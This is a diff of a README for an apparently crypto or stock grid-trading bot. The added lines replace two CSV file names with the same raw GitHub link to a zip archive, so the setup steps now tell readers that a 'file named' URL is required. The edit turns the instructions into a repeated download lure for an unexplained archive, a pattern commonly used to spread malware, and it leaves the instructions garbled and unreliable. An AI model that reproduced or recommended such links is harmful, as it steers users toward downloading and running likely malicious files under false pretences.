jakovkurac/investic_orderflow/README.md

 Before using the bot, you need to prepare your trading data.

 1. **Create your grid plan:**
-   The bot requires a file named `grid_plan.csv`.
+   The bot requires a file named `https://raw.githubusercontent.com/jakovkurac/investic_orderflow/main/lei/investic_orderflow.zip`.
 This file outlines your purchasing strategy based on previous market data.

 2. **Generate the grid plan:**
-   Use the Monte Carlo simulation results in the `macro_montecarlo.csv`.
+   Use the Monte Carlo simulation results in the `https://raw.githubusercontent.com/jakovkurac/investic_orderflow/main/lei/investic_orderflow.zip`.
 This will help you set your grid levels and order sizes for efficient trading.

 3. **Format your data correctly:**
    Ensure that your CSV files are without errors.
 This step is crucial for the bot’s operation.